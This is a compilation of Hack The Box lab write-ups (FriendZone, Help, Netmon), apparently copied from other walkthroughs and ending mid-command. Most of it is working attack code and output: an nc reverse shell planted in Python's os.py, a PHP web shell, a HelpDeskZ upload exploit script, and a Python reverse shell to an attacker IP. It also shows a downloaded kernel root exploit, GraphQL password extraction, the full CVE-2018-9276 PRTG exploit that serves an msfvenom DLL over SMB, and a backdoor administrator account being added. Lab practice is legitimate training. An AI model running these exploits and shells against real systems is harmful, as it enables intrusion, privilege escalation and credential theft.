friend@FriendZone:/usr/lib/python2.7$ echo "import os
> os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 9876 >/tmp/f')" >> os.py


C:\Users\jacco>nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.12] from administrator1.friendzone.red [10.10.10.123] 59782
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

Credits to : https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/

Author: Jacco Straathof

HTB – Help

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.121 --rate=1000

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-01-23 08:22:00 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.121
Discovered open port 80/tcp on 10.10.10.121
Discovered open port 3000/tcp on 10.10.10.121

masscan finds three open ports. Let’s do one better with nmap scanning the discovered ports.

# nmap -n -v -Pn -p22,80,3000 -A --reason 10.10.10.121 -oN nmap.txt
...
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    syn-ack ttl 63 Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (application/json; charset=utf-8).

We have two http services in the form of Apache and Node.js. This is how they look like.

d0d5ff90.png

f881d02b.png

The default Apache page suggests more enumeration needs to be done.

Directory/File Enumeration

Let’s fuzz it with gobuster and DirBuster’s wordlist just to see what we’ll get.

# gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -t 50 -e -u http://10.10.10.121/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.121/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded     : true
[+] Timeout      : 10s
=====================================================
2019/01/23 08:34:06 Starting gobuster
=====================================================
http://10.10.10.121/support (Status: 301)
http://10.10.10.121/javascript (Status: 301)
=====================================================
2019/01/23 08:39:48 Finished
=====================================================

I think I’ve seen enough. Let’s pay /support a visit.

efdf471d.png

Well, well, well. What do we have here? This must be our first attack surface.

HelpDeskZ 1.0.2 – Unauthenticated Arbitrary File Upload

Searching Google for an exploit in HelpDeskZ led me to EDB-ID 40300. Anyway, it looks like the site is running the vulnerable version.

ab9defc0.png

According to the exploit, HelpDeskZ suffers from an unauthenticated arbitrary file upload vulnerability where the software allows file attachment with ticket submission. The minor problem lies with determining the filename of the uploaded file. However, because the eventual file name depends on the time the file was uploaded, we can make an educated guess of the timestamp by shaving a couple of seconds from the current time.

Let’s submit a fake ticket and attach test.php, which is nothing more than the following PHP code.

<pre>
<?php echo shell_exec($_GET[0]); ?>
</pre>

f5e7fc4c.png

9687e6bb.png

Hmm. It says “File is not allowed”. Is that so? Let’s take a look at the source code controlling this behavior.

if(!isset($error_msg) && $settings['ticket_attachment']==1){
  $uploaddir = UPLOAD_DIR.'tickets/';   
  if($_FILES['attachment']['error'] == 0){
    $ext = pathinfo($_FILES['attachment']['name'], PATHINFO_EXTENSION);
    $filename = md5($_FILES['attachment']['name'].time()).".".$ext;
    $fileuploaded[] = array('name' => $_FILES['attachment']['name'], 'enc' => $filename, 'size' => formatBytes($_FILES['attachment']['size']), 'filetype' => $_FILES['attachment']['type']);
    $uploadedfile = $uploaddir.$filename;
    if (!move_uploaded_file($_FILES['attachment']['tmp_name'], $uploadedfile)) {
      $show_step2 = true;
      $error_msg = $LANG['ERROR_UPLOADING_A_FILE'];
    }else{
      $fileverification = verifyAttachment($_FILES['attachment']);
      switch($fileverification['msg_code']){
        case '1':
        $show_step2 = true;
        $error_msg = $LANG['INVALID_FILE_EXTENSION'];
        break;
        case '2':
        $show_step2 = true;
        $error_msg = $LANG['FILE_NOT_ALLOWED'];
        break;
        case '3':
        $show_step2 = true;
        $error_msg = str_replace('%size%',$fileverification['msg_extra'],$LANG['FILE_IS_BIG']);
        break;
      }
    }
  }
}

Two things worth nothing here. First of all, the final upload directory ends with tickets/. Second, regardless of the file verification results, the submission will ALWAYS progress to step 2 after the file has been uploaded.

In the words of POTUS: Fake News!

Where is the upload directory? If I have to guess, I would say the actual upload directory is like this:

http://10.10.10.121/support/uploads/tickets/

I cheated a bit. I actually enumerated the site for directories at a deeper level. :laughing:

Now, let’s re-purpose the exploit code and make it more adaptive to file extensions.

exploit.py
'''
Usage: python exploit.py http://10.10.10.121/support/uploads/tickets/ test.php
'''

import hashlib
import time
import sys
import requests

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
extension = fileName.split(".")[-1]

currentTime = int(time.time())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl + md5hash + '.' + extension
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)

print "Sorry, I did not find anything"

Armed with the insight gleaned from the source code, let’s upload again and find out where it’s uploaded to.

c:\PENTEST>python helpdeskz.py http://10.10.10.121/support/uploads/tickets/ test.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://10.10.10.121/support/uploads/tickets/c06a88701ab923e1eb97f477b1d2e595.php

b88c841c.png

772cc8ce.png

Awesome.

Let’s urlencode the following reverse shell in Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
http://10.10.10.121/support/uploads/tickets/9838b99a1c1cdc6ad1ec76fa831d732f.php?0=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.12%22,9001));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Privilege Escalation

On enumerating the box the kernel version is found to be 4.4.0-116-generic. A google search results in a kernel exploit for the version.
Start a simple http server and transfer it to the box then execute it.

help@help:/tmp$ wget http://10.10.14.13/44298.c
--2019-08-29 04:40:29-- http://10.10.14.13/44298.c
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5777 (5.6K) [text/plain]
Saving to: ‘44298.c’

44298.c 100%[====================>] 5.64K --.-KB/s in 0s

2019-08-29 04:40:29 (162 MB/s) - ‘44298.c’ saved [5777/5777]
help@help:/tmp$ gcc 44298.c -o exploit
help@help:/tmp$ chmod +x exploit
help@help:/tmp$ whoami
help
help@help:/tmp$ ./exploit
task_struct = ffff880038a29c00
uidptr = ffff88003bcb2c04
spawning root shell
root@help:/tmp# cd /
root@help:/# cd root
root@help:/root# ls
root.txt
root@help:/root# cat root.txt
b7f*****b98
root@help:/root#

Afterthought

I was intrigued by the message that there’s a way to retrieve credentials by providing the right query. Turns out the Node.js service was running GraphQL, an open-source data query and manipulation language for APIs. I’m not  familiar with GraphQL so this is an excellent opportunity to learn something about it.

root@kali:~/htb# apt-get install jq
root@kali:~/htb# curl -s -G http://10.10.10.121:3000/graphql --data-urlencode "query={user}" | jq
{
"errors": [
{
"message": "Field \"user\" of type \"User\" must have a selection of subfields. Did you mean \"user { ... }\"?",
"locations": [
{
"line": 1,
"column": 2
}
]
}
]
}
root@kali:~/htb# curl -s -G http://10.10.10.121:3000/graphql --data-urlencode 'query={user {username} }' | jq
{
"data": {
"user": {
"username": "helpme@helpme.com"
}
}
}
root@kali:~/htb# curl -s -G http://10.10.10.121:3000/graphql --data-urlencode 'query={user {username, password} }' | jq
{
"data": {
"user": {
"username": "helpme@helpme.com",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}

or with Burp

I cracked the MD5 password with https://hashkiller.co.uk/Cracker/MD5


5d3c93182bb20f07b994a7f617e99cff MD5 godhelpmeplz

note:for the file upload exploit to work i had to change the timezone

credits to : https://hackso.me/help-htb-walkthrough/

Author: Jacco Straathof

HTB – Netmon

Let’s start off with scanning with the nmap to check open ports.

c:\PENTEST>nmap -Pn -sC -sV -oA netmon-nmap 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 09:02 W. Europe Summer Time
Nmap scan report for 10.10.10.152
Host is up (0.014s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -37s, deviation: 0s, median: -37s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-28 09:02:38
|_ start_date: 2019-08-28 08:56:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds

We immediately proceed towards port 80 when we see it open. We find the PRTG Network Monitor page. But to use this dashboard, we need the login credentials.

In the nmap scan earlier, we saw that the FTP port 21 is open as well allows Anonymous Login. So, we login the FTP using the Anonymous as Login as well as password. After successfully logging, we use the ls command to list all the files that are shared. We see that we Users Directory available so we traverse into it using the cd command. Here, we have 2 more directories, Administrator and Public. We don’t have permission to access the Administrator directory so we move into the Public Directory. Here we find the user.txt file. We use the get command to download this file onto our system. Hence, we got our first flag, that is; the user flag.

Now we need to get the root flag. we found this post. This gives us the location of the data that PRTG Network Monitor stores, that is “%programdata%\Paessler\PRTG Network Monitor”. As we still have the FTP connection, we went to ProgramData directory and then traversed all the way to the location mentioned. Here we located an old configuration file. We downloaded this file to our system so that we can analyse it closely.

ftp> cd ProgramData
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 08:05AM <DIR> Application Data
02-03-19 08:05AM <DIR> Desktop
02-03-19 08:05AM <DIR> Documents
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 08:05AM <DIR> Start Menu
02-03-19 12:15AM <DIR> TEMP
02-03-19 08:05AM <DIR> Templates
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp: 729 bytes received in 0.07Seconds 11.22Kbytes/sec.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
PRTG Network Monitor
226 Transfer complete.
ftp: 25 bytes received in 0.00Seconds 25000.00Kbytes/sec.

After successfully downloading and searching through many lines of code, we stumbled upon the password, that was used previously. We took a guess here, as this was the previous configuration and it contains the year 2018 and whenever there is a current date in the password then they could be updated with the change in the date to the latest date.

This means, that the previous password was PrTg@dmin2018 and since the current year is 2019, we replaced 2018 in the password by 2019. This was an educated guess we made. So, using the new login credentials, we successfully logged in the PRTG Network Monitor Dashboard.

Login Name: prtgadmin
Password: PrTg@dmin2019

 

After looking around the dashboard for some time, we didn’t find anything that could help  So, we we searched the exploit dB for PRTG Network Monitor and found this exploit. On further researching on the internet about this exploit, we found this script on GitHub. This script creates a PowerShell file and then it uses it to run commands on the target system to create a user. But in order to work, it needs the cookie that was used in the original login in the dashboard of the PRTG Network Monitor. We capture the request using the Burp Suite. Upon close inspection of the captured packet, we find the cookie that we require.

Now, we clone the git directory that contains the script that we require to create a new user. After giving the necessary permissions to the file to run. We run the prtg-exploit.sh file, with the Target IP Address and the cookie, captured as parameters. This script can take some time to run depending on your connectivity speed. But after successfully running it creates a user with following credentials.

Now that, we have the user created on the target machine with Administrative Rights, let’s complete this challenge. , it didn’t work for me i used

root@kali:~/htb/netmon# python CVE-2018-9276.py -i 10.10.10.152 -p 80 --lhost 10.10.14.2 --lport 4444 --user prtgadmin --password PrTg@dmin2019
[+] [PRTG/18.1.37.13946] is Vulnerable!

[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.14.2 LPORT=4444 OUTPUT=/tmp/ngeafvls.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.14.2\PCBIRDQR]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.14.2:4444 for the reverse shell!]
listening on [any] 4444 ...
[*] Incoming connection (10.10.10.152,54363)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::4141414141414141
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.152] 54364
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user puck iestyle2019! /add
net user puck iestyle2019! /add
The command completed successfully.

C:\Windows\system32>net localgroup Administrators puck /add
net localgroup Administrators puck /add
The command completed successfully.

Code: https://github.com/wildkindcc/CVE-2018-9276/blob/master/CVE-2018-9276.py

#!/usr/bin/python
#####################################################################################
#
# Title:        PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
# Reference:    CVE-2018-9276
#               https://nvd.nist.gov/vuln/detail/CVE-2018-9276
# Author:       wildkindcc
# Date:         31/03/2019
# Description:  Re-write of exploit released by M4LVO (https://www.exploit-db.com/exploits/46527)
#               So skid friendly it even setups up netcat
#
#####################################################################################
import colorama
import argparse
import httplib, urllib
import traceback
import ssl
import random
import string
import json
import sys
import time
import os
from impacket.examples import logger
from impacket import smbserver, version
from impacket.ntlm import compute_lmhash, compute_nthash
import threading
import logging
import socket

#####################################################################################
# Adds colourised notifications to text
# Colourama is not neccesary for ANSI compliant terminals; however, it will make it work in windows.
colorama.init()
error = '\033[31m[!] \033[0m'       # [!] Red
fail = '\033[31m[-] \033[0m'        # [-] Red
success = '\033[32m[+] \033[0m'     # [+] Green
event = '\033[34m[*] \033[0m'       # [*] Blue
debug = '\033[35m[%] \033[0m'       # [%] Magenta
notification = '[-] '               # [-]

#####################################################################################
# argparse
# https://docs.python.org/3.3/library/argparse.html#module-argparse

def get_args():
    # This function parses and return arguments passed in
    # Help (-h --help) is automagically defined.
    # Assign description to the help doc
    parser = argparse.ArgumentParser(
        description='CVE-2018-9276')
    # Add arguments
    parser.add_argument(
        '-i', '--host', type=str, help='IP address / Hostname of vulnerable PRTG server', required=True)
    parser.add_argument(
        '-p', '--port', type=str, help='Port number', required=True)
    parser.add_argument(
        '--lhost', type=str, help='LHOST for MSFVENOM', required=True)
    parser.add_argument(
        '--lport', type=str, help='LPORT for MSFVENOM', required=True)        
    parser.add_argument(
        '--user', type=str, help='Administrator Username', required=False, default="prtgadmin")    
    parser.add_argument(
        '--password', type=str, help='Administrator Password', required=False, default="prtgadmin")        
    parser.add_argument(
        '--https', action='store_true', help='Negotiate SSL connection to the server (Requires socket to be compiled with SSL support)', required=False, default=None)        
    # Array for all arguments passed to script
    args = parser.parse_args()

    # Assign args to variables
    host = args.host
    port = args.port
    lhost = args.lhost
    lport = args.lport
    user = args.user
    password = args.password
    https = args.https
    # Return all variable values
    return host, port, lhost, lport, user, password, https

#####################################################################################
host, port, lhost, lport, user, password, https = get_args()
url = "%s:%s" % (host, port)

def checkVersion():
    # Check for SSL
    if https:
        conn = httplib.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = httplib.HTTPConnection(url)   
    
    conn.request("GET", "/")
    response = conn.getresponse()
    version = response.getheader('Server')
    conn.close()
  
    versionSplit = []
    vulnerable = True

    for var in version.split("/")[1].split(".")[:3]:
        versionSplit.append(var)

    if not int(versionSplit[0]) <= 18:
        print versionSplit[0]
        vulnerable = False
    
    if not int(versionSplit[1]) <= 2:
        print versionSplit[1]
        vulnerable = False

    if not int(versionSplit[2]) < 39:
        print versionSplit[2]
        vulnerable = False            

    if not vulnerable:
        raise ValueError('Server returned version [{}]'.format(version), "Versions < 18.2.39 are vulnerable to CVE-2018-9276")
    else:
        print success + "[{}] is Vulnerable!".format(version)
        return 0

def randomString(stringLength=8):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))

# Connects to the PRTG server instance and retrieves a valid session cookie.
def get_session():
    headers = {
        'Content-Type' : 'application/x-www-form-urlencoded'
    }
    payload = "loginurl=%2Fmyaccount.htm%3Ftabid%3D2&username={}&password={}".format(user, password)

    # Check for SSL
    if https:
        conn = httplib.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = httplib.HTTPConnection(url)   
    
    conn.request("POST", "/public/checklogin.htm", payload, headers)
    response = conn.getresponse()
    header = response.getheader('set-cookie')
    conn.close()
  
    if not header:
        raise ValueError('Session not obtained.  Check your usename/password and try again!')
    else:
        print success + "Session obtained for [{}:{}]".format(user, password)
        session = header.split(";")[0]
        return session  

def createFile(fileLocation):
    # Prepare the environment by creating an output file required for injection
    session = get_session()
    name = randomString()

    headers = {
        'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With' : 'XMLHttpRequest',
        'Cookie' : str(session)
    }
    payload = "name_={}&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=\"{}\"&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2".format(name, urllib.quote_plus(fileLocation))

    # Check for SSL
    if https:
        conn = httplib.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = httplib.HTTPConnection(url)   
    
    conn.request("POST", "/editsettings", payload, headers)
    response = conn.getresponse()

    objid = json.loads(response.read())['objid']  
    conn.close()

    print success + "File staged at [{}] successfully with objid of [{}]".format(fileLocation, objid)
    return objid

def prepareCommand(fileLocation, command):
    session = get_session()
    # File: log output which we require for injection
    # Session: A valid session ID returned from get_session
    name = randomString()

    headers = {
        'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With' : 'XMLHttpRequest',
        'Cookie' : str(session)
    }
    payload = "name_={}&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=\"{};{}\"&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2".format(name, urllib.quote_plus(fileLocation), urllib.quote_plus(command))

    # Check for SSL
    if https:
        conn = httplib.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = httplib.HTTPConnection(url)   
    
    conn.request("POST", "/editsettings", payload, headers)
    #conn.debuglevel = 1
    response = conn.getresponse()
    #print response.status, response.reason

    objid = json.loads(response.read())['objid']  
    conn.close()

    print success + "Command staged at [{}] successfully with objid of [{}]".format(fileLocation, objid)
    return objid

def notify(objid):
    session = get_session()

    headers = {
        'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With' : 'XMLHttpRequest',
        'Cookie' : str(session)
    }
    payload = "id={}".format(objid)

    # Check for SSL
    if https:
        conn = httplib.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = httplib.HTTPConnection(url)   
    
    conn.request("POST", "/api/notificationtest.htm", payload, headers)
    response = conn.getresponse()
    data = response.read()
    conn.close()

    if 'EXE notification is queued up' not in data:
        raise ValueError('Notify did not return the correct response.', data)
    else:
        print success + "Notification with objid [{}] staged for execution".format(objid)
        return 0

def initialise(fileLocation):
    objid = createFile(fileLocation)
    time.sleep(5)
    notify(objid)

def executeCommand(fileLocation, command):
    objid = prepareCommand(fileLocation, command)
    time.sleep(5)
    notify(objid)

def generatePayload(output, lhost, lport):
    print event + "Generate msfvenom payload with [LHOST={} LPORT={} OUTPUT={}]".format(lhost, lport, output)
    os.system("msfvenom -p windows/shell_reverse_tcp LHOST="+ lhost + " LPORT="+ lport +" -f dll > " + output)

def hostPayload(lhost, outputDir, shareName):   
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare(shareName, outputDir)   
    # If the host you're talking to doesnt support SMBv1 this can be uncommented to enable it.  This is an experimental impacket feature.
    #server.setSMB2Support(True)
    server.setSMBChallenge('')
    print event + "Hosting payload at [\\\\{}\{}]".format(lhost, shareName)
    server.start()
    time.sleep(5)
    server.stop()
 
#####################################################################################
logging.basicConfig(level=logging.DEBUG, format=event + '%(message)s',)

# Simple error handling because
try:
    # Default writable file location
    fileLocation = 'C:\\Users\\Public\\tester.txt'
    
    checkVersion()
    print ""
    print event + "Exploiting [%s:%s] as [%s/%s]" % (host, port, user, password)

    shellName = randomString()
    shareName = randomString().upper()
    outputDir = "/tmp"
    payload = "{}/{}.dll".format(outputDir,shellName)
    shellLocation = "\\\\{}\\{}\\{}.dll".format(lhost, shareName, shellName)

    initialise(fileLocation)

    # Generate our reverse shell payload
    generatePayload(payload, lhost, lport)

    # Setup the threading to run an impacket server in the background  
    impacket = threading.Timer(0, hostPayload, args=(lhost, outputDir, shareName,))
    impacket.setName('Impacket')
    impacket.setDaemon(True)
    impacket.start()

    # Little sleep just to make sure everything is dandy
    time.sleep(2)

    command = "rundll32.exe " + shellLocation + ",0"
    executeCommand(fileLocation, command)
    # Close the SMB server when no longer required
    print event + "Attempting to kill the impacket thread"
    print notification + "Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!"
    print notification + "ps aux | grep <script name> and kill -9 <pid> if it is still running :)"
    print notification + "The connection will eventually time out."
    impacket.cancel()
    print ""
    print success + "Listening on [{}:{} for the reverse shell!]".format(lhost, lport)
    os.system("nc -nvlp " + lport)

except ValueError as err:
    for errors in err:
        print error + errors
    traceback.print_exc()
except Exception:
    print error + "An unhandled exception has occured!"
    traceback.print_exc()


    




































 

 

root@kali:~/htb/netmon# smbmap -u puck -p 'iestyle2019!' -d netmon -H 10.10.10.152
[+] Finding open SMB ports....
